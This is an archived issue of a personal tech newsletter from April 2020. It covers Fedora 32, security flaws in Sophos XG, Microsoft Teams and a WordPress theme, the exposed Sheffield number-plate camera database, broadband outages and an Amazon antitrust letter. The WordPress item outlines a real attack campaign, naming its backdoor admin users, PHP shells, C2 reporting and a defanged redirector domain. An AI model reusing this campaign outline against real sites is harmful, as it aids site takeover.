FOXTROT/ALFA: Fedora 32, Sheffield License Plate Camera Database Wide Open, Internet Outages

Welcome to issue 110 of FOXTROT/ALFA! I’m a bit sleep deprived due to working pretty much 24/7, but I won’t let you start your day without the previous day’s tech news in your inbox. So here’s what’s happened on Tuesday, 28 April 2020.

Fedora 32 is Out

Fedora 23 has been released. It’s not exactly full of headline features…

Following our “First” foundation, we’ve updated key programming language and system library packages, including GCC 10, Ruby 2.7, and Python 3.8. Of course, with Python 2 past end-of-life, we’ve removed most Python 2 packages from Fedora. A legacy python27 package is provided for developers and users who still need it. In Fedora Workstation, we’ve enabled the EarlyOOM service by default to improve the user experience in low-memory situations.

Maybe a good upgrade if you’re a neuroscientist.

New in Fedora 32 is the Comp Neuro Lab, developed by our Neuroscience Special Interest Group to enable computational neuroscience.

Vulnerabilities and Data Breaches

Sophos has fixed a security vulnerability which could be exploited to gain access to sensible data on its Sophos XG Firewall. Which could then possibly be used for remote code execution.

This is a new pre-auth SQL injection vulnerability (CVE-2020-12271) designed to exfiltrate XG Firewall-resident data, including all local usernames and hashed passwords of any local user accounts, including local device admin accounts, user portal accounts, and accounts used for remote access. Passwords associated with external authentication systems such as Active Directory (AD) or LDAP are not directly at risk from this vulnerability. The attack can be performed against both user-facing and administrator-facing exposed services on the firewall.

In other news, Microsoft Team accounts could be hacked with a malicious GIF.

An attacker sends a GIF or an image to a victim and gets control over their account. This vulnerability worked just that way and had the potential to take over an organization’s entire roster of Microsoft Teams accounts.

You did have to get a GIF into their internal chat, though. And you needed to exploit a DNS misconfiguration to get access to a subdomain under teams.microsoft.com, though.

If you are running a really old WordPress theme called OneTone, you will want to get rid of that ASAP.

This theme vulnerability allows attackers to only inject HTML to certain places on the web page. To improve their chances of maintaining unauthorized access to the site, attackers use this vulnerability to inject Javascript through HTML’s <script> tags and hijack authenticated administrator sessions. When successful, the hijacked session can then be used to create a malicious admin user that exists as a backdoor to the infected website. This maliciously created admin user can also be used to add additional backdoors like PHP shells through the WordPress dashboard.

Planting a variety of backdoors ensures the success of the campaign — in the event that the vulnerability is patched or the JavaScript injection is removed, the attackers will still be able to access the compromised environment. Finally, all of the website and created user information is sent to a C2 server where the attacker can automate the collection of the new admin users from across many infected websites.

Since most website visitors will not be logged in as a wp-admin user, the last part of the malicious JavaScript is used to redirect those visitors elsewhere. It accomplishes this by checking if the value of the ppkcookie cookie equals un – if it doesn’t, the visitor is instead sent to the malicious redirector ischeck[.]xyz.

TIL: Sucuri is owned by GoDaddy. I had no idea.

The database for Sheffield’s automatic license plate scanners has leaked. Colour me surprised.

In a blunder described as “astonishing and worrying,” Sheffield City Council’s automatic number-plate recognition (ANPR) system exposed to the internet 8.6 million records of road journeys made by thousands of people. The ANPR camera system’s internal management dashboard could be accessed by simply entering its IP address into a web browser. No login details or authentication of any sort was needed to view and search the live system – which logs where and when vehicles, identified by their number plates, travel through Sheffield’s road network.

Does anybody still think these things are a good idea?

Outages, Outages Everywhere

Our internet infrastructure is obviously struggling to hold up to sustained use under the global lockdown.

Broadband outages have soared since the start of the COVID-19 lockdown, per data from US network intelligence firm ThousandEyes. Among the most recent victims is Virgin Media, which suffered intermittent failures across the UK and Ireland starting yesterday early evening, and continuing into the early hours of the morning.

ThousandEyes has pointed the finger at the UPC AS6830 Broadband network, which is owned by Virgin Media’s parent company, Liberty Global. Acquired in 2015, this network operates many peering arrangements with CDN providers, as well as other networks like Level 3 and Akamai.

This is of course not due to sustained usage. Of course not!

An update posted by Virgin to the outage section of its website stated the issue was “not caused by a spike in usage or a lack of network capacity”. The firm has since attributed the issue to a fault in the core network, but has yet to provide technical details.

The timing couldn’t be worse. Due to the ongoing lockdown, more people than ever are banking on reliable internet access to work and stay entertained.

Similar scenes are playing out here in Germany, where Vodafones cable networks were struck by outages . They blamed “a software problem” on “a server” for the downtime. They said they fixed it but troubles are still persisting.

I’m thinking this is because all these clowns never calculated with their stuff actually being used at capacity. When people actually start to use it a lot, it all fails, because all these companies are cutting corners everywhere to save costs. And obviously they never saw coming that the whole world would work from home for a few months.

US Senator Wants Criminal Antitrust Probe of Amazon

Take a guess… Does this sound like something a Democrat or a Republican would do? Surprise! It’s a Republican!

Amazon is already facing a bevy of antitrust probes, both in the United States and overseas. Just about every state, federal, and international regulator with any kind of competition regulation power is investigating the company over some aspect of its business. Sen. Josh Hawley (R-Mo.), however, wants to add one more to the pile and is calling on the Justice Department to launch a criminal probe.

“Recent reports suggest that Amazon has engaged in predatory and exclusionary data practices to build and maintain a monopoly,” Hawley wrote today in a letter to Attorney General William Barr. “These practices are alarming for America’s small businesses under ordinary circumstances. But at a time when most small retail businesses must rely on Amazon because of coronavirus-related shutdowns, predatory data practices threaten these businesses' very existence.”

I’ll be watching that one with great interest!

Also Noteworthy

A number of other stories I also read today:

This is an archived issue of my daily newsletter FOXTROT/ALFA. You can find more information about it, including how to subscribe via email, on this page.